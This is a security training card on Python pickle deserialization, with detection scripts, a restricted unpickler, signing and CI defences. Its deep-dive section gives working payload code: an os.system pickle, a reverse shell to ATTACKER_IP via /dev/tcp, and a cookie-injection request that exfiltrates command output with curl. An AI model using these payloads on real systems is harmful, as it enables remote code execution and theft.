Pickle deserialization
Theory
Why This Matters
Python's pickle module is the de facto serialization mechanism in the data science and machine learning ecosystem, and its attack surface has grown as ML model files (.pkl, .pt, .joblib) are shared through public model hubs. The Python documentation itself warns that pickle is not secure and that unpickling untrusted data can execute arbitrary code. More recently, researchers from Trail of Bits and HiddenLayer documented that PyTorch .pt files and scikit-learn .pkl files loaded from untrusted sources (Hugging Face Hub, S3 buckets, email attachments) can execute arbitrary Python code during torch.load() or joblib.load(), with no exploit sophistication required. Any web application that accepts serialized Python objects (in cookies, API parameters, file uploads, or ML model endpoints) is potentially vulnerable.
Core Concept
The pickle protocol is a stack-based virtual machine that reconstructs Python object graphs from a byte stream. When an object is serialized, pickle calls its __reduce__() method if one is defined. The return value is a tuple (callable, args), which is written into the stream as a reference to the callable plus its arguments. During deserialization the unpickler resolves that reference and invokes callable(*args). Because the default unpickler does not restrict which callable or args may appear, an attacker who controls the pickle stream can specify os.system as the callable and any shell command string as the argument.
The __reduce__ method is the standard exploitation primitive. A malicious pickle is constructed by serializing an object whose __reduce__ returns (os.system, ("id",)). When pickle.loads() processes this byte stream, it calls os.system("id"), which is arbitrary code execution with the privileges of the Python process.
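The split between serialization time and load time can be seen with a harmless callable. The following is a minimal sketch in which operator.add stands in for a dangerous callable; the class name Demo and the reduce_calls list are illustrative only.

```python
import operator
import pickle
import pickletools

reduce_calls = []  # records every time __reduce__ runs


class Demo:
    def __reduce__(self):
        reduce_calls.append("called")
        # Benign stand-in for (os.system, ("id",)): add two integers.
        return (operator.add, (2, 3))


# __reduce__ runs here, while the stream is being written.
stream = pickle.dumps(Demo(), protocol=4)
calls_after_dump = len(reduce_calls)

# Walk the opcodes without executing the stream.
opcode_names = [op.name for op, _arg, _pos in pickletools.genops(stream)]

# The unpickler resolves the callable and invokes operator.add(2, 3).
restored = pickle.loads(stream)
calls_after_load = len(reduce_calls)

print(opcode_names)
print("restored value:", restored)
print("__reduce__ calls after dump / after load:", calls_after_dump, calls_after_load)
```

The stream contains a STACK_GLOBAL opcode (the reference to the callable) followed by REDUCE (the call). The loaded value is the result of the call, not a Demo instance, and __reduce__ is not invoked again during loading.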
Magic bytes for pickle streams:
- Protocol 0 (ASCII): no fixed header; streams typically begin with an opcode character such as ( or c.
- Protocol 2: begins with \x80\x02.
- Protocol 3: begins with \x80\x03.
- Protocol 4: begins with \x80\x04.
- Protocol 5: begins with \x80\x05.
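These headers can be checked directly against the interpreter in use. The sketch below serializes a small benign dictionary (the sample value is arbitrary) at every protocol the running Python supports and prints the first two bytes of each stream.

```python
import pickle

sample = {"user": "alice"}

# First two bytes of the stream for every protocol this interpreter supports.
headers = {
    proto: pickle.dumps(sample, protocol=proto)[:2]
    for proto in range(pickle.HIGHEST_PROTOCOL + 1)
}

for proto, head in headers.items():
    print(f"protocol {proto}: {head!r}")
```

Protocols 0 and 1 have no version header, so their leading bytes depend on the object being serialized. Only protocols 2 and later start with 0x80 followed by the protocol number.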
Cloudpickle and dill extend pickle and are equally vulnerable — they serialize closures and lambdas, giving attackers even more expressive payloads.
Safe alternatives: json, msgpack, protobuf, and orjson do not support arbitrary object instantiation. For ML models, safetensors is the format specifically designed to eliminate the pickle attack surface. Never call pickle.loads(), joblib.load(), or torch.load() on data from an untrusted source without cryptographic provenance verification (signing + signature check before loading).
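A signature check before loading might look like the following sketch. It uses a shared-secret HMAC from the standard library as a stand-in for a registry-issued signature, and JSON as the payload format. The key value and the function names sign and load_verified are assumptions made for illustration.

```python
import hashlib
import hmac
import json

# Hypothetical key for illustration; a real deployment would load it from a secret store.
SIGNING_KEY = b"example-key-not-for-production"


def sign(blob: bytes, key: bytes = SIGNING_KEY) -> str:
    """Return a hex HMAC-SHA256 tag for the serialized blob."""
    return hmac.new(key, blob, hashlib.sha256).hexdigest()


def load_verified(blob: bytes, tag: str, key: bytes = SIGNING_KEY) -> dict:
    """Check the tag first; deserialize only if it matches."""
    if not hmac.compare_digest(sign(blob, key), tag):
        raise ValueError("signature mismatch; refusing to deserialize")
    return json.loads(blob)


blob = json.dumps({"user": "alice", "role": "admin"}).encode()
tag = sign(blob)
session = load_verified(blob, tag)
print(session)

# A modified blob no longer matches the tag and is rejected before parsing.
try:
    load_verified(blob.replace(b"alice", b"mallory"), tag)
    tampered_result = "accepted"
except ValueError as exc:
    tampered_result = f"rejected: {exc}"
print(tampered_result)
```

The ordering is the point of the sketch: the integrity check runs before any deserializer touches the bytes. An HMAC only proves that the holder of the shared key produced the blob; distributing models to third parties would more likely call for an asymmetric signature.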
Technical Deep-Dive
# ── Crafting a malicious pickle payload ───────────────────────────────────
import pickle, os, base64
class RCEPayload:
    """Malicious class: __reduce__ executes a shell command on deserialization."""
    def __init__(self, command):
        self.command = command
    def __reduce__(self):
        # pickle calls: os.system(self.command) during loads()
        return (os.system, (self.command,))
# Payload 1: simple command execution
payload = pickle.dumps(RCEPayload("id > /tmp/rce_proof.txt"))
print("[+] Raw payload bytes (hex):", payload.hex())
print("[+] Base64:", base64.b64encode(payload).decode())
# b64 will begin with gASV... (protocol 4) or gAJ... (protocol 2)
# Payload 2: reverse shell via subprocess
import subprocess
class RevShell:
    def __reduce__(self):
        cmd = "bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'"
        return (subprocess.check_output, (["/bin/bash", "-c", cmd],))
revshell_payload = pickle.dumps(RevShell())
print("[+] Reverse shell payload (b64):", base64.b64encode(revshell_payload).decode())
# ── Detection: identify pickle magic bytes in a cookie or parameter ────────
def is_pickle(data: bytes) -> bool:
    # Protocols 2-5 start with the PROTO opcode (0x80) followed by the version byte.
    return data[:2] in (b'\x80\x02', b'\x80\x03', b'\x80\x04', b'\x80\x05')
# Test against a cookie value
cookie_value = "gASVIAAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjAJpZJSFlFKULg=="
raw = base64.b64decode(cookie_value)
print("Is pickle?", is_pickle(raw)) # True
# ── Exploitation via cookie injection ─────────────────────────────────────
import requests
payload_b64 = base64.b64encode(pickle.dumps(RCEPayload("curl http://ATTACKER/$(id)"))).decode()
resp = requests.get(
    "https://app.example.com/dashboard",
    cookies={"session": payload_b64},
)
print(resp.status_code, resp.text[:200])
# ── Safe alternatives ──────────────────────────────────────────────────────
import json
# JSON: safe, no object instantiation
safe_data = json.loads(json.dumps({"user": "alice", "role": "admin"}))
# For ML models: use safetensors instead of torch.load()
# pip install safetensors
# from safetensors import safe_open
# Check for pickle magic bytes in captured HTTP traffic
# In Burp: Decoder tab → base64 decode a cookie → view as hex
# Magic bytes to look for: 80 02, 80 03, 80 04, 80 05
# Automated scan: look for b64-encoded pickles in all parameters
grep -oP "[A-Za-z0-9+/]{40,}={0,2}" requests.txt | while read -r b64; do
    # Hex of the first two decoded bytes, e.g. 8004 for protocol 4
    prefix=$(echo "$b64" | base64 -d 2>/dev/null | xxd -p | head -c 4)
    echo "$prefix" | grep -qE "^800[2-5]$" && echo "[PICKLE] $b64"
done
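Once a value is flagged as a pickle, it can be inspected without loading it. The sketch below walks the opcode stream with pickletools.genops and lists the globals the stream would import. The helper name referenced_globals is illustrative. The STACK_GLOBAL handling is a heuristic: it assumes the module and attribute names are the two most recently pushed strings, which holds for streams produced by pickle.dumps but not necessarily for hand-crafted ones.

```python
import os
import pickle
import pickletools

STRING_OPCODES = {"SHORT_BINUNICODE", "BINUNICODE", "BINUNICODE8", "UNICODE"}


def referenced_globals(data: bytes) -> list:
    """Return 'module.name' strings a pickle would import, without loading it."""
    found = []
    strings = []  # string arguments seen so far, used to resolve STACK_GLOBAL
    for opcode, arg, _pos in pickletools.genops(data):
        if opcode.name == "GLOBAL":
            # pickletools reports the argument as "module name"
            found.append(arg.replace(" ", "."))
        elif opcode.name in STRING_OPCODES:
            strings.append(arg)
        elif opcode.name == "STACK_GLOBAL" and len(strings) >= 2:
            found.append(f"{strings[-2]}.{strings[-1]}")
    return found


class Sample:
    """Serialized below for inspection only; the stream is never loaded."""
    def __reduce__(self):
        return (os.system, ("id",))


results = {}
for proto in (2, 4):
    stream = pickle.dumps(Sample(), protocol=proto)
    results[proto] = referenced_globals(stream)
    print(f"protocol {proto}: {results[proto]}")
```

A reference to a module such as posix, nt, os, subprocess, or builtins in an opaque cookie is a strong signal that the value is a payload rather than application data.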
Security Assessment Methodology
- Identify Python application indicators: Check X-Powered-By, error tracebacks (Python stack traces expose framework and Python version), file extensions (.py, .wsgi), and dependency files (requirements.txt, Pipfile).
- Search for serialized data in all cookie values and parameters: Base64-decode every cookie and opaque parameter. Check for pickle magic bytes (\x80\x02 through \x80\x05). Also search for .pkl, .pickle, .pt, .joblib in file upload endpoints.
- Craft a safe detection payload (OOB DNS): Build a pickle that executes nslookup YOUR.burpcollab.net or curl http://YOUR.interactsh.com. Submit and monitor for DNS callback. This confirms deserialization without writing files.
- Escalate to command execution: Replace the DNS payload with id > /tmp/pickle_rce_proof. Confirm file creation via a subsequent read (if the app has a file-reading endpoint) or via a web-accessible path.
- Test ML model upload endpoints: If the application accepts model file uploads, submit a .pkl or .pt file containing a malicious pickle. Observe for OOB callback on model loading.
- Test all serialization libraries: If cloudpickle or dill is in requirements.txt, test with those libraries' serialization format as well (they share the pickle protocol).
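The search step in the methodology above can be scripted for a batch of captured parameters. This is a rough sketch that also handles URL-safe base64 and stripped padding, both common in cookies. The function names and the sample parameter values are made up for illustration.

```python
import base64
import binascii
import pickle

# PROTO opcode (0x80) followed by the protocol number, for protocols 2-5.
PICKLE_HEADERS = tuple(bytes([0x80, proto]) for proto in range(2, 6))


def decode_candidate(value: str):
    """Decode standard or URL-safe base64; return bytes, or None if invalid."""
    normalized = value.strip().replace("-", "+").replace("_", "/")
    normalized += "=" * (-len(normalized) % 4)  # restore stripped padding
    try:
        return base64.b64decode(normalized, validate=True)
    except (binascii.Error, ValueError):
        return None


def find_pickle_params(params: dict) -> list:
    """Return the names of parameters whose decoded value starts like a pickle."""
    hits = []
    for name, value in params.items():
        raw = decode_candidate(value)
        if raw is not None and raw[:2] in PICKLE_HEADERS:
            hits.append(name)
    return hits


# Sample request data: one benign pickle encoded the way a cookie might carry it.
benign = pickle.dumps({"user": "alice"}, protocol=4)
params = {
    "session": base64.urlsafe_b64encode(benign).decode().rstrip("="),
    "theme": "dark",
    "id": "12345",
}
flagged = find_pickle_params(params)
print(flagged)
```

This only covers the binary protocols. Protocol 0 streams have no header and need a separate text-based check.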
Defensive Countermeasure: Never call pickle.loads() on data from any untrusted source. Replace pickle-based session cookies with cryptographically signed JSON (e.g., Flask's itsdangerous with TimestampSigner). For ML model distribution, enforce safetensors format and verify a cryptographic signature (SHA-256 hash + signature from a trusted registry) before loading any model file. Add import pickle to a static analysis forbidden-import list in CI.
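A forbidden-import check for CI can be approximated with the standard ast module. The sketch below is illustrative rather than a replacement for a real linter rule. The FORBIDDEN set and the function name are assumptions, and the check does not catch dynamic imports or indirect loaders such as torch.load() and joblib.load().

```python
import ast

# Assumed policy: block pickle and the libraries that extend it.
FORBIDDEN = {"pickle", "cPickle", "dill", "cloudpickle"}


def forbidden_imports(source: str, filename: str = "<string>") -> list:
    """Return sorted (line, module) pairs for every forbidden import in source."""
    hits = []
    for node in ast.walk(ast.parse(source, filename=filename)):
        if isinstance(node, ast.Import):
            names = [alias.name for alias in node.names]
        elif isinstance(node, ast.ImportFrom):
            names = [node.module or ""]
        else:
            continue
        for name in names:
            # Compare the top-level package so "pickle.something" also matches.
            if name.split(".")[0] in FORBIDDEN:
                hits.append((node.lineno, name))
    return sorted(hits)


example = "import os\nimport pickle\nfrom dill import loads\nimport json\n"
violations = forbidden_imports(example)
for line, module in violations:
    print(f"line {line}: forbidden import of {module}")
```

In a pipeline, a wrapper script would run this over each changed .py file and exit non-zero when the list is non-empty.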
Common Assessment Errors
- Assuming only cookies are affected: Pickles appear in POST body parameters, URL query strings, file uploads, and even Redis/Memcached cache values that the application later deserializes. Check all data paths.
- Forgetting that dill and cloudpickle are equally vulnerable: If pickle is replaced with dill or cloudpickle, the vulnerability is identical. Search for all three in requirements.txt.
- Using a blocking payload in a blind context: os.system() blocks until the command completes. A reverse shell payload will hang the request. Use OOB (curl/DNS) for blind contexts to avoid detection and denial-of-service.
- Missing ML model endpoints: torch.load() (unless restricted with weights_only=True), joblib.load(), and numpy.load() with allow_pickle=True all run the pickle unpickler internally. Model upload and load endpoints are often forgotten in assessments.
- Not checking the protocol version: Protocol 0 pickles (ASCII-based, no magic bytes) can be injected in contexts where binary bytes are not allowed. Check for values starting with ( or c in text-based parameters.
- Assuming safe_load equivalents exist for pickle: Unlike PyYAML (which has safe_load), Python's pickle has no built-in safe loading mode. The protocol as a whole is unsafe for untrusted input.
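Although pickle has no safe mode, the Python documentation describes a way to narrow what a stream may import by overriding Unpickler.find_class. The sketch below follows that pattern. The allow-list contents and the class names are assumptions, and this approach reduces the attack surface rather than making untrusted pickles safe.

```python
import builtins
import io
import os
import pickle

# Assumed allow-list: a few harmless builtins and nothing else.
SAFE_BUILTINS = {"range", "complex", "set", "frozenset", "slice"}


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Called for every global the stream references, before it is used.
        if module == "builtins" and name in SAFE_BUILTINS:
            return getattr(builtins, name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def restricted_loads(data: bytes):
    """Drop-in analogue of pickle.loads() that enforces the allow-list."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


class Blocked:
    """Test object whose stream references os.system; it is never executed."""
    def __reduce__(self):
        return (os.system, ("echo should-never-run",))


benign = restricted_loads(pickle.dumps([1, 2, range(3)]))
print("benign:", benign)

try:
    restricted_loads(pickle.dumps(Blocked()))
    outcome = "loaded"
except pickle.UnpicklingError as exc:
    outcome = f"rejected: {exc}"
print(outcome)
```

The rejection happens when the unpickler tries to resolve the global, so the command is never run. An allow-list that includes a class with dangerous side effects would reopen the hole, which is why data-only formats remain the safer choice for untrusted input.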
NICE Framework Alignment
| Code | Knowledge/Skill/Task Statement | How This Card Develops It |
|---|---|---|
| K0009 | Knowledge of application vulnerabilities | Explains the __reduce__ mechanism that makes pickle deserialization inherently unsafe |
| K0070 | Knowledge of system and application security threats and vulnerabilities | Connects pickle RCE to the ML model supply chain threat landscape |
| S0001 | Skill in conducting vulnerability scans and recognizing vulnerabilities in security systems | Trains magic byte detection and OOB-first confirmation methodology |
| S0044 | Skill in mimicking threat behaviors to test defenses | Develops pickle payload crafting skill using Python's own serialization API |
| T0028 | Conduct and support authorized penetration testing on enterprise networks | Provides a complete methodology from detection through RCE confirmation |
| T0591 | Perform penetration testing as required for new or updated applications | Frames pickle testing as required for Python applications and ML endpoints |
Further Reading
- "Exploiting Misuse of Python's Pickle" — checkoway.net (offline reference)
- HiddenLayer: ML Model Backdoors via Pickle — HiddenLayer Research (2023)
- safetensors: Safe ML Model Serialization — Hugging Face Documentation